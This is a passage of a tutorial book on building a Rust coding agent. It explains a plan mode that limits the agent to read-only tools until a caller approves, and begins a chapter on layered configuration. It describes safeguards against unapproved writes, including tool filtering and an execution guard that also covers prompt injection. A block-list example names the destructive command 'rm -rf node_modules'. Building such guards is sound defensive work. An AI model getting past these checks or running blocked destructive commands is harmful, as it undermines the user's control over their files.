The PlanAgent is a separate struct that wraps the same building blocks -- a provider, a ToolSet -- but orchestrates them differently. Two methods, plan() and execute(), implement the two phases. The caller controls the transition between them. This keeps the SimpleAgent simple and gives the PlanAgent full control over its workflow.

Claude Code takes a similar approach. Its plan mode sets PermissionMode::Plan, which the permission engine enforces (only read-only tools pass). The UI shows a "Plan Mode" banner and the agent's plan before asking for approval. Our PlanAgent encapsulates the same two-phase pattern with caller-driven approval.


The PlanAgent struct

#![allow(unused)]
fn main() {
use std::collections::HashSet;

use tokio::sync::mpsc;

use crate::agent::{AgentEvent, tool_summary};
use crate::streaming::{StreamEvent, StreamProvider};
use crate::types::*;

pub struct PlanAgent<P: StreamProvider> {
    provider: P,
    tools: ToolSet,
    read_only: HashSet<&'static str>,
    plan_system_prompt: String,
    exit_plan_def: ToolDefinition,
}
}

Five fields, each with a clear role:

  • provider -- The LLM backend. Note the StreamProvider bound -- the PlanAgent uses streaming internally for the plan/execute loop.
  • tools -- The full tool set. During planning, only a subset is exposed. During execution, all tools are available.
  • read_only -- An explicit set of tool names allowed during planning. Only the listed tools are available during the plan phase.
  • plan_system_prompt -- The system prompt injected during planning. A default is provided via the DEFAULT_PLAN_PROMPT constant.
  • exit_plan_def -- The ToolDefinition for the virtual exit_plan tool. This tool is injected into the plan phase's tool list but does not exist in the ToolSet. It is a signal, not a real tool.

The builder

The builder follows the same new() + chaining pattern as SimpleAgent. The new() constructor creates the exit_plan_def with a description that tells the model what it does. This definition has no parameters -- the model just calls it to signal "I am done planning."

#![allow(unused)]
fn main() {
let agent = PlanAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new())
    .read_only(&["read"])
    .plan_prompt("You are a security auditor.");
}

Two builder methods are specific to PlanAgent:

  • read_only(&[&'static str]) -- Sets the tool names allowed during planning. If you call .read_only(&["bash", "read"]), only bash and read are available during planning. This is useful for specialized workflows where you want the agent to run commands (like git log or cargo test --dry-run) during analysis.

  • plan_prompt(impl Into<String>) -- Replaces the default planning system prompt. The default says "You are in PLANNING MODE. Explore the codebase using the available tools and create a plan." A custom prompt can focus the agent on a specific concern: security auditing, performance analysis, migration planning.


The two phases

The core of PlanAgent is two methods: plan() and execute(). They share the same loop structure as the SimpleAgent's chat(), but with different tool sets and different termination conditions. Both methods also take an mpsc::UnboundedSender<AgentEvent> for streaming events back to the caller.

flowchart LR
    A["User prompt"] --> B["plan()<br/>read-only tools<br/>+ exit_plan"]
    B --> C["Plan text"]
    C --> D{"Caller<br/>approves?"}
    D -->|Yes| E["Push approval<br/>message"]
    D -->|No| F["Push feedback<br/>message"]
    F --> B
    E --> G["execute()<br/>all tools"]
    G --> H["Final result"]

The caller drives the transition. After plan() returns, the caller can:

  1. Show the plan to the user
  2. Push a Message::user("Approved. Go ahead.") into the message history
  3. Call execute() with the same message vec

Or the caller can reject the plan, push feedback, and call plan() again. The PlanAgent does not care -- it has no built-in UI, no approval dialog. It is a workflow agent, not a user interface.


Phase 1: plan()

The planning phase runs a restricted agent loop. Only read-only tools and the virtual exit_plan tool are available. Both plan() and execute() delegate to a shared run_loop() method:

#![allow(unused)]
fn main() {
pub async fn plan(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Inject system prompt if needed
    // Call run_loop with Some(&self.read_only)
    unimplemented!()
}

pub async fn execute(
    &self,
    messages: &mut Vec<Message>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Call run_loop with None (no restrictions)
    unimplemented!()
}
}

The run_loop() method is the shared agent loop. When allowed is Some, only those tools plus exit_plan are permitted. When allowed is None, all tools are available:

Here is the full implementation of run_loop:

#![allow(unused)]
fn main() {
async fn run_loop(
    &self,
    messages: &mut Vec<Message>,
    allowed: Option<&HashSet<&'static str>>,
    events: mpsc::UnboundedSender<AgentEvent>,
) -> anyhow::Result<String> {
    // Step 1: filter tool definitions
    let all_defs = self.tools.definitions();
    let defs: Vec<&ToolDefinition> = match allowed {
        Some(names) => {
            let mut filtered: Vec<&ToolDefinition> = all_defs
                .into_iter()
                .filter(|d| names.contains(d.name))
                .collect();
            filtered.push(&self.exit_plan_def);
            filtered
        }
        None => all_defs,
    };

    loop {
        // Step 2: stream the LLM response (forward text deltas to UI)
        let (stream_tx, mut stream_rx) = mpsc::unbounded_channel();
        let events_clone = events.clone();
        let forwarder = tokio::spawn(async move {
            while let Some(event) = stream_rx.recv().await {
                if let StreamEvent::TextDelta(ref text) = event {
                    let _ = events_clone.send(AgentEvent::TextDelta(text.clone()));
                }
            }
        });

        let turn = self.provider.stream_chat(messages, &defs, stream_tx).await?;
        let _ = forwarder.await;

        // Step 3: match on stop reason
        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                let _ = events.send(AgentEvent::Done(text.clone()));
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let mut results = Vec::with_capacity(turn.tool_calls.len());

                for call in &turn.tool_calls {
                    // Handle exit_plan
                    if allowed.is_some() && call.name == "exit_plan" {
                        let text = turn.text.clone().unwrap_or_default();
                        let _ = events.send(AgentEvent::Done(text.clone()));
                        messages.push(Message::Assistant(turn));
                        messages.push(Message::ToolResult {
                            id: call.id.clone(),
                            content: "Plan submitted for review.".into(),
                        });
                        return Ok(text);
                    }

                    // Block tools not in allowed set
                    if let Some(names) = allowed {
                        if !names.contains(call.name.as_str()) {
                            results.push((
                                call.id.clone(),
                                format!("error: tool `{}` is not available in planning mode",
                                    call.name),
                            ));
                            continue;
                        }
                    }

                    // Execute allowed tools
                    let content = match self.tools.get(&call.name) {
                        Some(t) => t.call(call.arguments.clone()).await
                            .unwrap_or_else(|e| format!("error: {e}")),
                        None => format!("error: unknown tool `{}`", call.name),
                    };
                    results.push((call.id.clone(), content));
                }

                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
            }
        }
    }
}
}

The structure mirrors the SimpleAgent's chat loop. Same loop, same provider call, same stop-reason match. But the PlanAgent uses streaming internally via StreamProvider, and three things are different:

1. System prompt injection

Before entering the loop, plan() injects the planning system prompt at position 0 of the message history (if not already present), telling the model it is in planning mode.

2. Filtered tool definitions

The plan phase filters tool definitions to only include tools in the read_only set, plus the exit_plan tool. The model cannot see write tools in its schema, so it has no reason to call them.

3. The exit_plan escape hatch

When the model calls exit_plan, the plan phase ends immediately. The loop pushes the assistant message and a synthetic tool result ("Plan submitted for review.") into the history, then returns. The synthetic result is necessary because the API requires every tool call to have a corresponding result -- without it, the next provider call would fail.

The plan phase can end in two ways:

  • StopReason::Stop -- The model produces a text response directly. This is the implicit exit.
  • exit_plan tool call -- The model explicitly signals it is done analyzing. This is the explicit exit.

Both return the plan text (which may be empty if the model put its plan in tool calls rather than text).


The exit_plan tool

The exit_plan tool deserves its own section because it is unusual. It is not a real tool. It does not exist in the ToolSet. It has no call() method. It is a ToolDefinition with a name and description, injected into the plan phase's tool list so the model sees it as an option.

Why not just rely on StopReason::Stop? In principle you could: tell the model "when you are done planning, emit your plan as plain text and stop." In practice this fights against two behaviours baked into most instruction-tuned models.

  1. When tools are visible, models keep using them. Present a model with read, glob, grep, and a user prompt, and it will happily spend ten turns exploring the codebase before producing any narrative output. There is no natural stopping gradient -- one more grep is always plausible. Without a deliberate stopping signal, the plan phase drags on.
  2. Plain-text stops are easy to mistake for partial work. A model that ends a turn with "Next, I need to check how X is wired" is signalling "I am still working" even when stop_reason == Stop. The caller cannot easily distinguish a finished plan from a mid-thought pause.

exit_plan sidesteps both problems. It is a tool the model must actively choose to call, which reads as an explicit commitment ("I am ready"). It carries the plan text as its argument, so the plan and the stop signal arrive in the same structured message. And because it lives in the same tool-call slot the model is already used to, the behaviour composes naturally with the rest of the loop. It is a social contract expressed as a tool schema.

When the model calls exit_plan, the loop detects it by name, pushes the assistant message, finds the call's ID, and pushes a synthetic ToolResult with "Plan submitted for review." The synthetic result is important -- the message protocol requires every ToolCall to have a matching ToolResult. Skip it and the next API call fails with a malformed request.


Phase 2: execute()

The execution phase is a standard agent loop with the full tool set. No filtering, no virtual tools, no special termination. The execute() method calls run_loop(messages, None, events) -- passing None for the allowed set means all tools are available.

The key point: execute() receives the same &mut Vec<Message> that plan() used. The message history from planning -- the system prompt, the user request, the read-only tool calls, the plan text -- is all still there. The model enters execution with full context of what it analyzed and what it decided to do. This continuity is what makes the two-phase pattern effective. The model does not start from scratch; it picks up where it left off.

Between plan() and execute(), the caller typically pushes a user message:

#![allow(unused)]
fn main() {
let (tx, _rx) = mpsc::unbounded_channel();
let plan = agent.plan(&mut messages, tx.clone()).await?;
println!("Plan: {plan}");

// User approves
messages.push(Message::user("Approved. Go ahead."));

let result = agent.execute(&mut messages, tx).await?;
}

This approval message becomes part of the context for execution. The model sees it and knows it has permission to proceed with modifications.


Defense in depth: tool filtering

The plan phase uses two layers of protection to prevent write operations:

Layer 1: Definition filtering

The run_loop method filters the tool schemas sent to the model when an allowed set is provided. Only tools whose names are in the set are included, plus exit_plan.

If the model does not see a tool in its schema, it has no reason to call it. This is the primary defense -- remove the temptation.

Layer 2: Execution guard

Even if the model somehow requests a blocked tool (hallucination, prompt injection, or a creative interpretation of the schema), the run_loop method catches it. For each tool call, three things happen:

  1. exit_plan is handled specially -- When the model calls exit_plan, the loop returns the plan text immediately. A synthetic tool result is pushed so the message history stays valid.

  2. Blocked tools return errors -- If a tool is not in the allowed set, the tool is not executed. Instead, an error string is returned to the model. The model sees this error, understands the constraint, and adjusts.

  3. Allowed tools execute normally -- Lookup, call, return result. The same pipeline as the SimpleAgent's tool execution.

Both layers must fail for a write operation to slip through during planning.

Key Rust concept: HashSet<&'static str> for zero-cost string sets

The read_only field uses &'static str rather than String. This means the set contains references to string literals that live for the entire program -- no heap allocation, no cloning. The 'static lifetime tells the compiler these strings never become invalid, which is always true for string literals like "read" or "bash". The trade-off is that you can only put compile-time-known strings into the set, not dynamically generated ones. For tool names, which are always known at compile time, this is the ideal choice.

The read_only set

The read_only field is a HashSet<&'static str> containing the tool names allowed during planning. It is set via the read_only() builder method:

#![allow(unused)]
fn main() {
pub fn read_only(mut self, names: &[&'static str]) -> Self {
    self.read_only = names.iter().cloned().collect();
    self
}
}

Unlike the reference implementation which can fall back to checking is_read_only() flags on tools, the starter requires you to explicitly name the allowed tools. This is simpler -- there are no is_read_only() or is_destructive() methods on the Tool trait in the starter.


System prompt injection

The plan phase injects a system message to tell the model it is in planning mode. This is handled by maybe_inject_plan_prompt():

#![allow(unused)]
fn main() {
fn maybe_inject_plan_prompt(&self, messages: &mut Vec<Message>) {
    // Don't inject if a system message already exists
    let has_system = messages
        .first()
        .is_some_and(|m| matches!(m, Message::System(_)));

    if !has_system {
        messages.insert(0, Message::System(self.plan_system_prompt.clone()));
    }
}
}

Three design decisions here:

  1. Respect existing system prompts -- The method checks whether any Message::System is already present at position 0. If the caller already set a system prompt (e.g., "You are a security auditor"), plan mode respects it rather than overwriting it. If plan() is called twice, the second call finds the existing message and skips injection.

  2. Position 0 -- The planning prompt is inserted at the beginning of the message list, before any existing messages. System prompts at position 0 have the strongest influence on model behavior.

  3. Custom or default -- If plan_prompt() was called on the builder, that text is used. Otherwise, the default tells the model it is in planning mode, should use read-only tools, and should call exit_plan when done.


The full plan-execute flow

Let's trace through a realistic scenario to see how everything fits together. The user wants to copy a source file to a new location.

Setup:

#![allow(unused)]
fn main() {
let engine = PlanAgent::new(provider)
    .tool(ReadTool::new())
    .tool(WriteTool::new());

let mut messages = vec![Message::user("Copy src.txt to dst.txt")];
}

Plan phase -- plan() injects the planning system prompt, filters definitions to [read, exit_plan] (write is excluded), and enters the loop. The model calls read(path="src.txt"), sees the contents, and returns "I'll copy src.txt to dst.txt."

Approval -- The caller prints the plan and pushes a user message:

#![allow(unused)]
fn main() {
println!("Plan: {}", plan);
messages.push(Message::user("Approved. Go ahead."));
}

Execute phase -- execute() exposes all tools. The model calls write(path="dst.txt", content="source content"), the file is created on disk, and the model returns "Done! Copied the file."

The message history at the end contains the complete trace: planning system prompt, user request, read-only analysis, plan text, approval, write operation, final confirmation. The model had full context at every step.


Event streaming: plan_with_events()

Like SimpleAgent, the PlanAgent has an event-streaming variant. The plan/execute methods take an mpsc::UnboundedSender<AgentEvent> and emit ToolCall, TextDelta, Done, and Error events as the phase runs. The pattern mirrors run_with_events() from the agent module.

A TUI would use this to show a spinner while the agent reads files during planning, display the plan text as it streams, and prompt the user for approval before calling execute().


How Claude Code does it

Claude Code's plan mode follows the same two-phase pattern but integrates more deeply with the permission system.

FeatureOur PlanAgentClaude Code
Tool filteringExplicit read-only setPermissionMode::Plan flag
UI integrationCaller-driven (no built-in UI)"Plan Mode" banner in TUI
Approval flowCaller pushes user messageUI dialog with approve/reject
System promptTagged plan_mode messageMode-specific prompt section
Exit signalexit_plan virtual toolMode transition in permission engine
Write blockingTwo layers (definitions + execution)Permission engine rejects non-read-only

The biggest difference is where the enforcement happens. In Claude Code, the permission engine handles it -- plan mode is just another permission mode that rejects non-read-only tool calls. The SimpleAgent does not need to know about plan mode at all. Our approach is simpler and self-contained: everything about plan mode lives in one struct, at the cost of less flexibility for "semi-plan" modes that allow some writes but not others.


Tests

Run the plan mode tests:

cargo test -p mini-claw-code-starter plan

Key tests:

  • test_plan_plan_text_response -- Plan phase returns text directly when the LLM responds with StopReason::Stop.
  • test_plan_plan_with_read_tool -- Plan phase allows read tool calls and returns the plan text.
  • test_plan_plan_blocks_write_tool -- Plan phase blocks write tool calls, returns error to LLM, and verifies the file was not created on disk.
  • test_plan_plan_blocks_edit_tool -- Plan phase blocks edit tool calls and the original file remains unchanged.
  • test_plan_execute_allows_write_tool -- Execute phase permits writes and the file is created on disk.
  • test_plan_full_plan_then_execute -- Complete two-phase flow: plan reads a file, execution writes to a new file.
  • test_plan_message_continuity -- Message history grows correctly across plan and execute phases (system + user + assistant messages accumulate).
  • test_plan_read_only_override -- Custom read_only(&["read"]) excludes bash from the plan phase.
  • test_plan_streaming_events_during_plan -- Plan phase emits TextDelta and Done events through the channel.
  • test_plan_exit_plan_tool -- The virtual exit_plan tool ends planning and injects a synthetic tool result.
  • test_plan_system_prompt_injected -- Plan phase inserts a PLANNING MODE system message at position 0.
  • test_plan_system_prompt_not_duplicated -- Calling plan() twice does not duplicate the system prompt.
  • test_plan_exit_plan_not_in_execute -- During execute, exit_plan is treated as an unknown tool.
  • test_plan_custom_plan_prompt -- Custom plan prompt replaces the default planning instructions.
  • test_plan_full_flow_with_exit_plan -- End-to-end: read during planning, exit_plan, approve, write during execution.

Key takeaway

Plan mode is caller-driven separation of concerns: the agent analyzes with read-only tools first, the caller reviews and approves, then the agent executes with the full tool set. The same message history flows through both phases, giving the execution phase complete context from the planning phase.


Recap

Plan mode completes Part III -- Safety & Control. Over four chapters you built the layers that turn a reckless agent into a disciplined one:

  • Chapter 13: Permission Engine -- Checks every tool call against permission rules before execution. Ask, allow, or deny based on the tool and the mode.
  • Chapter 14: Safety Checks -- Static analysis of tool arguments. Catches dangerous patterns before the permission prompt appears.
  • Chapter 15: Hook System -- Pre-tool and post-tool hooks for custom policies. Run linters after edits, block certain paths, enforce project rules.
  • Chapter 16: Plan Mode -- A two-phase workflow that separates analysis from action. The agent reads and reasons first, then modifies only after approval.

The key architectural insight is caller-driven approval. The PlanAgent does not prompt the user, display a dialog, or make assumptions about the UI. It runs the plan, returns the text, and waits. The caller decides what to do next. This separation of concerns -- engine logic vs. user interaction -- is what makes the same PlanAgent work in a CLI, a TUI, a web interface, or a test harness.


What's next

Part III gave your agent safety and control. Part IV -- Configuration -- builds the systems that make your agent project-aware:

  • Chapter 17: Settings Hierarchy -- Layered configuration from global defaults to project-specific overrides.
  • Chapter 18: Project Instructions -- Loading and assembling CLAUDE.md files that tell the agent how to work with this specific codebase.

The safety infrastructure you built in Part III protects the agent from doing harm. The configuration infrastructure in Part IV teaches it to do good.

Check yourself


← Chapter 15: Hooks · Contents · Chapter 17: Settings Hierarchy →

Chapter 17: Settings Hierarchy

File(s) to edit: src/config.rs, src/usage.rs Tests to run: cargo test -p mini-claw-code-starter config (Config, ConfigLoader), cargo test -p mini-claw-code-starter cost_tracker (CostTracker) Estimated time: 60 min

Your agent works. It reads files, writes code, runs commands, checks permissions, enforces safety rules, and restricts itself in plan mode. But every one of those behaviors is hardcoded. The model name is a string literal. The blocked commands list is baked into the source. The maximum context window is a constant. If you want to change any of them, you recompile.

Real tools do not work this way. A developer using Claude Code on a Rust project wants different settings than one working on a Python monorepo. A CI pipeline needs different defaults than an interactive session. A user who routes through a self-hosted proxy needs a different base URL. The agent must be configurable -- and the configuration must come from multiple sources, layered by priority, so that project settings override user settings, and environment variables override everything.

This chapter builds a 4-level configuration hierarchy and a cost tracker. By the end, both config (config) and cost_tracker (cost tracker) should pass.

cargo test -p mini-claw-code-starter config  # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker  # CostTracker

Goal

  • Define a Config struct with serde defaults so that partial TOML files deserialize into complete configurations.
  • Define a ConfigOverlay struct whose fields are Option<T>, so the loader can tell "field not set in the TOML" apart from "field explicitly set to the default value."
  • Implement the merge() function with a single rule: every Some(_) in the overlay replaces the base.
  • Build ConfigLoader to assemble four layers (defaults, project config, user config, environment variables) in priority order.
  • Implement CostTracker to accumulate token counts and compute running cost estimates from per-million pricing.

Why layers?

A flat config file would be simple. One config.toml, one source of truth, done. But it breaks down immediately in practice:

  • User preferences like model choice and API base URL should follow you across every project. You should not have to set model = "anthropic/claude-sonnet-4-20250514" in every repository.
  • Project settings like blocked commands and protected file patterns are specific to one codebase. A node project might block rm -rf node_modules while a Rust project blocks cargo publish --allow-dirty.
  • Environment overrides let CI pipelines inject settings without touching config files. MINI_CLAW_MODEL=anthropic/claude-haiku-3-20250414 in a GitHub Actions workflow switches to a cheaper model for automated checks.
  • Defaults provide sane behavior when nothing is configured at all.

The solution is layered configuration. Each layer can set any field. Higher-priority layers override lower ones. Fields not set in a layer fall through to the next one down.

Priority (highest to lowest):

  1. Environment variables    MINI_CLAW_MODEL, MINI_CLAW_BASE_URL, MINI_CLAW_MAX_TOKENS
  2. User config              ~/.config/mini-claw/config.toml
  3. Project config            .claw/config.toml
  4. Defaults                  hardcoded in code

Claude Code uses the same approach. Its hierarchy goes: CLI flags > environment > user settings > project settings > defaults. The merge logic is more sophisticated -- it supports per-key overrides and array merging strategies -- but the architecture is identical.

flowchart TD
    A["Config::default()"] -->|merge| B["Project config<br/>.claw/config.toml"]
    B -->|merge| C["User config<br/>~/.config/mini-claw/config.toml"]
    C -->|override| D["Environment variables<br/>MINI_CLAW_MODEL, etc."]
    D --> E["Final Config"]

    style A fill:#e8e8e8
    style E fill:#c8e6c9

The Config struct

All configuration lives in a single Config struct at src/config/mod.rs:

#![allow(unused)]
fn main() {
use std::path::{Path, PathBuf};

use serde::{Deserialize, Serialize};

#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Config {
    #[serde(default = "default_model")]
    pub model: String,

    #[serde(default = "default_base_url")]
    pub base_url: String,

    #[serde(default = "default_max_tokens")]
    pub max_context_tokens: u64,

    #[serde(default = "default_preserve_recent")]
    pub preserve_recent: usize,

    #[serde(default)]
    pub allowed_directory: Option<String>,

    #[serde(default)]
    pub protected_patterns: Vec<String>,

    #[serde(default)]
    pub blocked_commands: Vec<String>,

    #[serde(default)]
    pub instructions: Option<String>,
}
}

Eight fields spanning three categories: provider settings, safety settings, and agent behavior.

Provider settings

model identifies which LLM to use. The default is "anthropic/claude-sonnet-4-20250514" -- an OpenRouter model path. If a user routes through a different provider or wants a cheaper model for testing, they override this.

base_url is the API endpoint. The default points to OpenRouter (https://openrouter.ai/api/v1). Users running a local proxy, a corporate gateway, or a different OpenAI-compatible API change this to point at their endpoint.

max_context_tokens caps the context window at 200,000 tokens. A compaction engine would read this value to decide when to summarize old messages. Different models have different context limits -- Haiku supports 200K, but a self-hosted model might only handle 8K.

Safety settings

allowed_directory restricts file operations to a single directory tree. When set, the Write, Edit, and Read tools refuse to touch anything outside this path. This is a blunt but effective sandbox -- useful in CI where the agent should only modify the checkout directory.

protected_patterns is a list of glob patterns for files that cannot be written to. A project might protect *.lock files, .env, or Cargo.toml to prevent the agent from accidentally modifying build-critical files.

blocked_commands lists command substrings that the bash tool rejects. If any blocked substring appears in a command, execution is denied. This is the configuration surface for the safety checks from Chapter 14.

Agent behavior

preserve_recent controls how many recent messages the compaction engine preserves. When compacting, the engine summarizes older messages but keeps the most recent preserve_recent messages intact so the model has fresh context. The default of 10 keeps roughly the last 2-3 tool-use rounds.

instructions injects custom text into the system prompt. This is where project-specific guidance goes -- "always use async/await", "prefer Vec over slices in public APIs", "tests must use the mock provider". Chapter 18 builds the full instruction system; this field is the config hook for it.

Key Rust concept: #[serde(default)] for partial deserialization

Serde's default attribute is what makes partial config files work. When a TOML file omits a field, serde normally fails with "missing field." The #[serde(default = "function_name")] attribute tells serde to call the named function instead of failing. For fields that default to None or empty Vec, the simpler #[serde(default)] calls Default::default(). This pattern is idiomatic in Rust configuration: every field has a sensible default, and the user only specifies what they want to change. The alternative -- requiring every field in every config file -- would make partial configs impossible.

Default functions and the serde trick

Each field with a non-trivial default uses a named function:

#![allow(unused)]
fn main() {
fn default_model() -> String {
    "anthropic/claude-sonnet-4-20250514".into()
}

fn default_base_url() -> String {
    "https://openrouter.ai/api/v1".into()
}

fn default_max_tokens() -> u64 {
    200_000
}

fn default_preserve_recent() -> usize {
    10
}
}

The #[serde(default = "default_model")] attribute tells serde to call default_model() when the model field is missing from the TOML input. This is what makes partial config files work. A project config that only sets blocked_commands still deserializes into a full Config -- every omitted field gets its default.

Fields that default to "empty" (Option<String>, Vec<String>) use the simpler #[serde(default)] attribute, which calls Default::default() -- None for Option, empty Vec for collections.

The Default impl for Config mirrors these functions exactly:

#![allow(unused)]
fn main() {
impl Default for Config {
    fn default() -> Self {
        Self {
            model: default_model(),
            base_url: default_base_url(),
            max_context_tokens: default_max_tokens(),
            preserve_recent: default_preserve_recent(),
            allowed_directory: None,
            protected_patterns: Vec::new(),
            blocked_commands: Vec::new(),
            instructions: None,
        }
    }
}
}

Having both the Default impl and the serde defaults is intentional. Config::default() is used in code -- constructing a base config, comparing against defaults in the merge logic. The #[serde(default = "...")] attributes are used during deserialization. They must agree, and sharing the same named functions guarantees they do.


The overlay: telling "unset" from "set to default"

Before we can write the merge function, we need a way to answer a question that Config itself cannot answer: was this field actually set in the TOML file?

A natural first attempt is "compare the overlay value against Config::default() -- if it differs, it was set." That heuristic is wrong. It cannot distinguish two different situations:

  1. The user did not set the field in their TOML.
  2. The user did set the field, and the value they set happens to equal the default.

Case 2 is not hypothetical. If the default model is "anthropic/claude-sonnet-4-20250514" and the user explicitly writes model = "anthropic/claude-sonnet-4-20250514" in their user config to assert it regardless of project overrides, the comparison-to-default heuristic silently treats it as "not set" and keeps whatever the previous layer had. Last-write-wins is violated.

The fix is to encode "set" vs "not set" in the type system. We introduce a second struct -- ConfigOverlay -- whose fields are Option<T>. Serde deserializes a missing TOML key as None and a present one as Some(value). No value comparison needed.

#![allow(unused)]
fn main() {
#[derive(Debug, Clone, Default, Deserialize)]
#[serde(default)]
pub struct ConfigOverlay {
    pub model: Option<String>,
    pub base_url: Option<String>,
    pub max_context_tokens: Option<u64>,
    pub preserve_recent: Option<usize>,
    pub allowed_directory: Option<String>,
    pub protected_patterns: Option<Vec<String>>,
    pub blocked_commands: Option<Vec<String>>,
    pub instructions: Option<String>,
}
}

The struct-level #[serde(default)] tells serde to fall back to Default::default() for any field missing from the TOML input — and Default::default() for Option<T> is None. That is exactly the "key absent → None" mapping we want, and we get it without annotating every field individually.

The two structs play complementary roles. Config is the fully-resolved output: every field has a value, everyone downstream can read it without caring how it got there. ConfigOverlay is the transport format: a partial, optional view of the same shape, used only while merging layers.

Even Vec<T> fields become Option<Vec<T>>. This matters -- an overlay that sets protected_patterns = [] in TOML means "clear the list," which is different from "did not mention the list at all." An Option<Vec<T>> represents both cases cleanly; a bare Vec<T> cannot.

The merge logic

With the overlay in hand, merge becomes uniform: every Some(_) in the overlay replaces the corresponding field in the base, and every None leaves the base untouched.

#![allow(unused)]
fn main() {
pub fn merge(base: Config, overlay: ConfigOverlay) -> Config {
    Config {
        model: overlay.model.unwrap_or(base.model),
        base_url: overlay.base_url.unwrap_or(base.base_url),
        max_context_tokens: overlay.max_context_tokens.unwrap_or(base.max_context_tokens),
        preserve_recent: overlay.preserve_recent.unwrap_or(base.preserve_recent),
        allowed_directory: overlay.allowed_directory.or(base.allowed_directory),
        protected_patterns: overlay.protected_patterns.unwrap_or(base.protected_patterns),
        blocked_commands: overlay.blocked_commands.unwrap_or(base.blocked_commands),
        instructions: overlay.instructions.or(base.instructions),
    }
}
}

Two patterns cover every field:

  • unwrap_or(base.x) for fields where Config holds a concrete value (e.g. String, u64, Vec<String>). If the overlay has Some(v), the result is v; otherwise the base value is kept.
  • .or(base.x) for fields that are already Option<T> on Config (allowed_directory, instructions). Option::or returns the first Some(_) it finds.

That is the entire merge. No value comparisons. No special cases per field. A later layer always wins when it sets a field, regardless of whether the value it sets matches the default, matches the previous layer, or is empty.

Collections: replace, not append

When an overlay does set protected_patterns or blocked_commands, its value fully replaces the base. Appending would mean every config layer adds to the list with no way to remove entries from a lower layer. Replacing gives each layer that mentions the field full control over its contents.

Consider a project that protects .env and .secret at the project level. If the user config also sets protected_patterns = [".credentials"], the replace strategy means only .credentials is protected -- the project patterns are gone. Since project config is loaded first (lowest priority among files) and user config is loaded second (higher priority), the user config's patterns replace the project's. For most settings this makes sense -- the user knows their environment better than the project author.

If you wanted append semantics, you would extend the collections instead:

#![allow(unused)]
fn main() {
// Append (not what we do):
if let Some(extra) = overlay.protected_patterns {
    base.protected_patterns.extend(extra);
}
}

Claude Code supports both strategies depending on the field. Our implementation keeps it simple with replace-only, and the overlay's Option<Vec<T>> type is what lets "layer did not mention this field" stay distinct from "layer explicitly set it to an empty list."


ConfigLoader: assembling the layers

The ConfigLoader orchestrates the full merge pipeline:

#![allow(unused)]
fn main() {
pub struct ConfigLoader {
    project_dir: Option<PathBuf>,
}

impl ConfigLoader {
    pub fn new() -> Self {
        Self { project_dir: None }
    }

    pub fn project_dir(mut self, dir: impl Into<PathBuf>) -> Self {
        self.project_dir = Some(dir.into());
        self
    }

    pub fn load(&self) -> Config {
        let mut config = Config::default();

        // Layer 1: Project config (.claw/config.toml)
        if let Some(ref dir) = self.project_dir {
            let project_path = dir.join(".claw").join("config.toml");
            if let Some(overlay) = Self::load_file(&project_path) {
                config = Self::merge(config, overlay);
            }
        }

        // Layer 2: User config (~/.config/mini-claw/config.toml)
        if let Some(user_dir) = dirs::config_dir() {
            let user_path = user_dir.join("mini-claw").join("config.toml");
            if let Some(overlay) = Self::load_file(&user_path) {
                config = Self::merge(config, overlay);
            }
        }

        // Layer 3: Environment variables (highest priority)
        config = Self::apply_env(config);

        config
    }
}
}

The builder pattern lets callers optionally specify a project directory. In a real agent, this is the working directory where the user invoked the tool. In tests, it is a temp directory.

The load order matters

The load() method applies layers from lowest to highest priority:

  1. Start with Config::default() -- the absolute baseline.
  2. Merge the project config (.claw/config.toml) -- project-specific overrides.
  3. Merge the user config (~/.config/mini-claw/config.toml) -- user-wide preferences.
  4. Apply environment variables -- the ultimate override.

Each merge takes the current accumulated config as the base and the new layer as the overlay. Non-default overlay values replace the base. This means user config beats project config, and environment variables beat everything.

The dirs::config_dir() call uses the dirs crate to find the platform-appropriate config directory -- ~/.config on Linux, ~/Library/Application Support on macOS, %APPDATA% on Windows. This follows the XDG Base Directory Specification on Linux and platform conventions elsewhere.

Loading a single file

#![allow(unused)]
fn main() {
pub fn load_file(path: &Path) -> Option<ConfigOverlay> {
    let content = std::fs::read_to_string(path).ok()?;
    toml::from_str(&content).ok()
}
}

Two lines, two possible failure points, both handled with .ok()?:

  1. The file might not exist -- read_to_string returns Err, .ok() converts to None, ? returns None.
  2. The file might contain invalid TOML -- toml::from_str returns Err, same chain.

Notice the return type is Option<ConfigOverlay>, not Option<Config>. The loader deliberately parses into the partial type -- that is how merge later knows which fields the file actually mentioned.

Returning Option<_> instead of Result<_, Error> is a deliberate choice. Missing config files are not errors -- they are the normal case. Most users will not have a user config file. Most projects will not have a .claw/config.toml. The loader should silently skip missing files and apply defaults. Invalid TOML is arguably an error worth reporting, but for simplicity we treat it the same way. A production implementation would log a warning for parse failures while still falling back to defaults.

The toml crate handles deserialization. Because every field on ConfigOverlay is Option<T> with #[serde(default)], a TOML file that only sets one field still parses cleanly -- every other field becomes None:

# This is a valid config file:
model = "anthropic/claude-haiku-3-20250414"

This deserializes into a ConfigOverlay with model: Some(...) and every other field None. When merge applies it, only model is touched on the base.

Environment variable overrides

#![allow(unused)]
fn main() {
fn apply_env(mut config: Config) -> Config {
    if let Ok(model) = std::env::var("MINI_CLAW_MODEL") {
        config.model = model;
    }
    if let Ok(url) = std::env::var("MINI_CLAW_BASE_URL") {
        config.base_url = url;
    }
    if let Ok(tokens) = std::env::var("MINI_CLAW_MAX_TOKENS") {
        if let Ok(n) = tokens.parse::<u64>() {
            config.max_context_tokens = n;
        }
    }
    config
}
}

Environment variables are the simplest layer -- no files, no parsing, no merge logic. If the variable exists, its value replaces the field. If it does not exist, the field is untouched.

Only three fields have environment variable support: model, base_url, and max_context_tokens. These are the fields most commonly overridden in CI and scripting contexts. Safety fields like blocked_commands and protected_patterns are intentionally excluded from environment overrides -- you do not want a compromised environment variable to disable your safety rules.

